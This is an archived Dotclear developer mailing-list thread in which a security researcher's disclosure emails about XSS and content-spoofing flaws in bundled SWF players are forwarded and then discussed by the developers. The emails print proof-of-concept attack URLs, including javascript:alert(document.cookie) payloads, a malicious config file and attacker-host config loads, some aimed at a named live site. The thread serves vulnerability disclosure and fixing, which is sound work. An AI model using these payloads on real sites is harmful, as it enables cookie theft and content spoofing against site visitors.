2:53 p.m.
Voilà la réponse à ma question de ce matin, je vous laisse le soin de gérer
ça, j'suis à l'ouest point de vue question sécu là (pas encore bien compris
les tenants et les aboutissants de ces failles ni leur dangerosités
potentielles).
---------- Forwarded message ----------
From: MustLive <mustliveua(a)gmail.com>
Date: 2013/4/12
Subject: Re: XSS and CS vulnerabilities in Dotclear
To: "Dotclear (contact)" <contact(a)dotclear.net>
**
*Hi guys!*
You are welcome!.
I was trying to help you yet in 14th of January :-). But it looks like you
haven't received my letter (I always deal with not serious people who don't
receive my letters due to their lame antispam filters, but it's their own
problem and everyone must do everything to receive letters from other
people, make sure that antispam filters work correctly - remove spam, but
left normal letters, especially allow security related letters). This is
strange, that you haven't received my letter from 14th of June, but
received letter from 9th of April. Exactly because I've not received answer
from my letter from 10.04, I've send new letter yesterday from another my
e-mail (from gmail), which I was using for many years specially for such
cases, when I see people not received my letters (with no responses or
there are "returns" that filters don't allow letters from my e-mail, to
bypass such lame filters). This letter I'm sending from my gmail account
for sure.
Because I was planning to disclose this letter this week, since almost
three months passed since informing you in January, so I've reminded
you three days ago. First I planned to disclose it in Tuesday evening, but
because it turned out that you have fixed (and badly) only holes in
SWFUpload, then I postponed it to Wednesday, then to Thursday and now to
Friday evening. But I'm planning to do it at last this evening (and will
write to security lists tomorrow), so you need to fix today these holes in
swf already ;-).
After I saw that you have fixed only holes in SWFUpload and mentioned only
about it, I begun thinking that you haven't received my letter in January.
And you became aware about holes SWFUpload related to Dotclear after my
advisories in November and March. But in that my letter I wrote about much
more holes in your engine (in all three swf-files).
I'm resending my January's letter bellow. Note that in letter I've not
wrote much details of holes in player_mp3.swf to make the letter more
laconical. Anyway holes are similar to player_flv.swf - all CS holes are
similar for both these flash applications and there are no XSS holes in mp3
player. Here are details for player_mp3.swf, so it'll be more obvious for
you (xml and txt config files are similar for both these flashes).
*Content Spoofing (WASC-12):*
http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt
http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3
Certainly give me any URL of web site on Dotclear 2.5, so I can check your
protection against attacks on swf-files. Note that your protection, on
which you referenced (that you made it in version 2.5), is only for Apache
and not for other web servers. As I've checked yesterday, you have used
.htaccess to block access to files (including swf files). But .htaccess
works only in Apache and on nginx and other web servers your engine will
not be protected, and all XSS and CS holes in these three flashes can be
used for attacks.
Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
----- Original Message -----
*From:* MustLive <mustlive(a)websecurity.com.ua>
*To:* contact(a)dotclear.net
*Sent:* Monday, January 14, 2013 12:57 AM
*Subject:* XSS and Content Spoofing vulnerabilities in Dotclear
*Hello developers of Dotclear!*
I want to warn you about Cross-Site Scripting and Content Spoofing
vulnerabilities in Dotclear. After I've wrote about Magazeen theme for
WordPress and Dotclear (which was using vulnerable TimThumb), here are
new vulnerabilities related to Dotclear.
I mentioned about these vulnerabilities in Magazeen theme at my site (
http://websecurity.com.ua/5120/) in 2011. You can read on English: about
vulnerabilities in TimThumb and in multiples themes for different engines (
http://lists.grok.org.uk/pipermail/full-disclosure/2011-April/080258.html)
and about vulnerabilities in Magazeen theme (
http://lists.grok.org.uk/pipermail/full-disclosure/2011-May/080659.html).
These were Cross-Site Scripting (WASC-08), Full path disclosure (WASC-13),
Abuse of Functionality (WASC-42) and Denial of Service (WASC-10)
vulnerabilities in TimThumb and later also Arbitrary File Uploading
(WASC-31) vulnerability. And now I'm informing you about Cross-Site
Scripting and Content Spoofing in core of your CMS.
Your engine has three swf files (according to your site
http://dev.dotclear.org/2.0/browser/inc/swf), I suppose last version
Dotclear 2.4.4 too. And these file are vulnerable to XSS and CS, so your
engine has these holes.
File swfupload.swf it's Swfupload and it has XSS vulnerability. I've wrote
about swfupload.swf in different engines, including in Dotclear, at my site
(http://websecurity.com.ua/6144/) in 2012.
*Cross-Site Scripting (WASC-08):*
http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)s...
File player_flv.swf it's FLV Player and it has a lot of
vulnerabilities. I've wrote about vulnerabilities in FLV Player in
advisory at my site (http://websecurity.com.ua/5098/) in 2011. On English (
http://lists.grok.org.uk/pipermail/full-disclosure/2011-August/082321.html).
*Cross-Site Scripting (WASC-08):*
http://site<http://site/dotclear/inc/swf/player_flv.swf?onclick=javasc...
/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)<http://site/dotclear/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)>
*Content Spoofing (WASC-12):*
http://site<http://site/dotclear/inc/swf/player_flv.swf?onclick=javasc...
/inc/swf/player_flv.swf?configxml=http://attacker/1.xml<http://www.noslibertes.org/dotclear/inc/swf/player_flv.swf?configxml=http://attacker/1.xml>
Here are all holes in FLV Player.
*Content Spoofing (WASC-12):*
http://site/player_flv_classic.swf?configxml=http://site/1.xml
http://site/player_flv_maxi.swf?configxml=http://site/1.xml
http://site/player_flv_classic.swf?config=http://site/1.txt
http://site/player_flv_maxi.swf?config=http://site/1.txt
http://site/player_flv_classic.swf?flv=http://site/film.flv&startimag...
http://site/player_flv_maxi.swf?flv=http://site/film.flv&startimage=h...
http://site/player_flv_mini.swf?flv=http://site/film.flv
*XSS (WASC-08):*
http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)...
http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.c...
http://site/player_flv_maxi.swf?configxml=http://site/xss.xml
File xss.xml
<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)"
/>
<param name="ondoubleclick"
value="javascript:alert(document.cookie)" />
</config>
http://site/player_flv_maxi.swf?config=http://site/xss.txt
File xss.txt
onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)
The code will execute after a click (or double click). It's strictly
social XSS.
File player_flv.swf it's some mp3 player, but it has similar holes as FLV
Player (if not all, then many of above-mentioned holes).
*Content Spoofing (WASC-12):*
http://site<http://site/dotclear/inc/swf/player_flv.swf?onclick=javasc...
/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml<http://www.noslibertes.org/dotclear/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml>
Vulnerable are all versions of Dotclear - Dotclear 2.4.4 and previous
versions.
Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
----- Original Message -----
*From:* Dotclear (contact) <contact(a)dotclear.net>
*To:* MustLive <mustliveua(a)gmail.com>
*Sent:* Friday, April 12, 2013 8:22 AM
*Subject:* Re: XSS and CS vulnerabilities in Dotclear
Hi,
Of course we will not leave any vulnerabilities in our script, as far as
possible, and we would like to know exactly what are the other holes you
talked about (in two other swf-files). Could you explain us what they are ?
We have also looked carefully in our two different mail archive and cannot
found any mail from you on last 14 january 2013. We heard about this
problems in swfupload by another way. If it was the case we, as usual,
thanks you in a way or another, be sure about this.
Thanks a lot for helping us.
Franck for DC Team
2013/4/11 MustLive <mustliveua(a)gmail.com>
**
*Hi Franck!*
So what about those things, which I've wrote you about yesterday?
Are you planning to fix other holes (in two other swf-files), are you
planning to fix flash-file of SWFUpload or will just use your "non-direct
access to swf-files" approach (to prevent abuse of vulnerable swf-files
instead of fixing them), and will you give me any URL of web site on
Dotclear 2.5, so I can check it?
Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
----- Original Message -----
*From:* MustLive <mustlive(a)websecurity.com.ua>
*To:* Dotclear (contact) <contact(a)dotclear.net>
*Sent:* Wednesday, April 10, 2013 9:47 PM
*Subject:* Re: XSS and CS vulnerabilities in Dotclear
*Hello Franck!*
Since there was no answer from you on my letter from 14.01.2013, so I
decided that you've ignored my letter. Because most of those who doesn't
answer on my letters, they just ignore and don't fix holes. And others (who
doesn't answer on my letters) fix hiddenly without thanking and without
official mentioning (at site and/or in changelog) about fixing of
vulnerabilities and those who informed about them. I haven't received any
thanks and/or official mentionings of me since 14th of January.
Plus I've informed you about multiple vulnerabilities in three flashes,
not in just one swf-file (uploader) on which you are referencing (without
calling its name - SWFUpload, but it's clear for me, but not for others,
nor it's not count as official referencing on me and to the lists of fixed
holes, i.e. you should clearly write about fixing three holes: 2 Cross-Site
Scripting and 1 Content Spoofing vulnerabilities, not mentioning holes in
two other flash-files). From this it's clear that you've not fixed holes in
player_flv.swf and player_mp3.swf, just fixed (and badly, see below) holes
in swfupload.swf.
You said you've fixed holes in SWFUpload, but it's not so. Before sending
my previous letter to you, I've checked your site, because almost 3 months
pasted since informing you and I planed to disclose these holes soon. And
at your site (http://dev.dotclear.org/2.0/browser/inc/swf) I've found
that none changes were made for player_flv.swf and player_mp3.swf and only
swfupload.swf was changed (at 13.03.2013) to fix the holes in it. So you've
ignored holes in first two flashes and just fixed (without answering and
thanking me) holes in third swf-file. I've downloaded it and checked it
on localhost and found that it's vulnerable to all holes, which I've
informed you about. So you didn't fix these holes either. And after that
I've wrote you my last letter.
In which version (2.5) and how did you fix these holes, since all three
swf-files are vulnerable? Did you prevent flashes from being called
directly, as you wrote? Then give me example of any site on Dotclear 2.5,
so I can check it. I saw only sites with older versions of Dotclear which
are vulnerable to all these attacks on flashes.
> Note also that any of the injections given in example cannot be used
with Dotclear as our swf files cannot be called directly.
Why do you think that your swf files can be called directly. At those web
sites, which I've found in Internet, I see that they can be called
directly. So I have not seen such protection and for this reason considered
all vulnerabilities in swf files in Dotclear as real and informed you.
Here are examples of one web site on your engine:
*Cross-Site Scripting (WASC-08):*
http://www.noslibertes.org/dotclear/inc/swf/swfupload.swf?movieName=%22])...
*Content Spoofing (WASC-12):
*
http://www.noslibertes.org/dotclear/inc/swf/swfupload.swf?buttonText=test...
*Cross-Site Scripting (WASC-08):*
http://www.noslibertes.org/dotclear/inc/swf/swfupload.swf?buttonText=%3Ca...
And similar attacks on other flash-files, about which I've informed you -
on XSS and CS vulnerabilities in player_flv.swf and player_mp3.swf.
Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
2:59 p.m.
New subject: XSS and CS vulnerabilities in Dotclear
E
t il va rendre ça public demain : But I'm planning to do it at last this
evening (and will write to security lists tomorrow), so you need to fix
today these holes in swf already ;-)
4:17 p.m.
New subject: XSS and CS vulnerabilities in Dotclear
N
oé, tu pourrais te charger de créer une page dans la doc qui explique la
protection des
r
épertoires (inc, …) selon l'appli qui fait office de serveur web :
Apache : déjà intégré à la
distrib via .htaccess
n
ginx : ??? (probablement du côté de la config du vhost)
lightppd : ??? (idem ci-dessus je pense)
IIS : droits sur le répertoire (à confirmer éventuellement par xave qu'est
une pointure dans ce domaine)
?
Merci, bisous !
Franck
12:12 a.m.
New subject: XSS and CS vulnerabilities in Dotclear
Attention, même dans apache le .htaccess ne suffit parfois pas : pour des
soucis de perf, on peut vouloir les désactiver et donc il faut configurer
la protection dans sa configuration générale.
Le 17 avr. 2013 16:18, "Dotclear (contact)" <contact(a)dotclear.net> a écrit
:
N
oé, tu pourrais te charger de créer une page dans la doc qui explique la
protection des
r
épertoires (inc, …) selon l'appli qui fait office de serveur web :
Apache : déjà intégré à la
distrib via .htaccess
n
ginx : ??? (probablement du côté de la config du vhost)
lightppd : ??? (idem ci-dessus je pense)
IIS : droits sur le répertoire (à confirmer éventuellement par xave qu'est
une pointure dans ce domaine)
?
Merci, bisous !
Franck
_______________________________________________
Dev mailing list - Dev(a)list.dotclear.org -
http://ml.dotclear.org/listinfo/dev
9:23 a.m.
New subject: XSS and CS vulnerabilities in Dotclear
C'est d'ailleurs ma configuration par défaut. L'avantage de le mettre dans
la configuration d'apache directement c'est que c'est lu qu'une seule
fois
et pas à chaque requête !
Le 18 avril 2013 00:12, Julien Wajsberg <felash(a)gmail.com> a écrit :
Attention, même dans apache le .htaccess ne suffit parfois pas : pour
des
soucis de perf, on peut vouloir les désactiver et donc il faut configurer
la protection dans sa configuration générale.
Le 17 avr. 2013 16:18, "Dotclear (contact)" <contact(a)dotclear.net> a
écrit :
> N
> oé, tu pourrais te charger de créer une page dans la doc qui explique la
> protection des
> r
> épertoires (inc, …) selon l'appli qui fait office de serveur web :
>
> Apache : déjà intégré à la
>
> distrib via .htaccess
>
> n
> ginx : ??? (probablement du côté de la config du vhost)
> lightppd : ??? (idem ci-dessus je pense)
> IIS : droits sur le répertoire (à confirmer éventuellement par xave
> qu'est une pointure dans ce domaine)
>
> ?
>
> Merci, bisous !
>
> Franck
>
>
> _______________________________________________
> Dev mailing list - Dev(a)list.dotclear.org -
> http://ml.dotclear.org/listinfo/dev
>
_______________________________________________
Dev mailing list - Dev(a)list.dotclear.org -
http://ml.dotclear.org/listinfo/dev
10:50 a.m.
New subject: XSS and CS vulnerabilities in Dotclear
je crois que dès que tu as un AllowOverride, Apache cherche un .htaccess
dans tous les répertoires traversés à chaque requête, donc même s'il n'y a
pas de .htaccess il y a une pénalité...
2013/4/18 Nicolas <nikrou77(a)gmail.com>
C'est d'ailleurs ma configuration par défaut. L'avantage
de le mettre dans
la configuration d'apache directement c'est que c'est lu qu'une seule
fois
et pas à chaque requête !
Le 18 avril 2013 00:12, Julien Wajsberg <felash(a)gmail.com> a écrit :
Attention, même dans apache le .htaccess ne suffit parfois pas : pour des
> soucis de perf, on peut vouloir les désactiver et donc il faut configurer
> la protection dans sa configuration générale.
> Le 17 avr. 2013 16:18, "Dotclear (contact)" <contact(a)dotclear.net> a
> écrit :
>
>> N
>> oé, tu pourrais te charger de créer une page dans la doc qui explique la
>> protection des
>> r
>> épertoires (inc, …) selon l'appli qui fait office de serveur web :
>>
>> Apache : déjà intégré à la
>>
>> distrib via .htaccess
>>
>> n
>> ginx : ??? (probablement du côté de la config du vhost)
>> lightppd : ??? (idem ci-dessus je pense)
>> IIS : droits sur le répertoire (à confirmer éventuellement par xave
>> qu'est une pointure dans ce domaine)
>>
>> ?
>>
>> Merci, bisous !
>>
>> Franck
>>
>>
>> _______________________________________________
>> Dev mailing list - Dev(a)list.dotclear.org -
>> http://ml.dotclear.org/listinfo/dev
>>
>
> _______________________________________________
> Dev mailing list - Dev(a)list.dotclear.org -
> http://ml.dotclear.org/listinfo/dev
>
_______________________________________________
Dev mailing list - Dev(a)list.dotclear.org -
http://ml.dotclear.org/listinfo/dev
4034
days inactive
4040
days old
7 comments
5 participants
participants (5)
-
Dotclear (contact) -
Franck Paul -
Julien Wajsberg -
Lomalarch -
Nicolas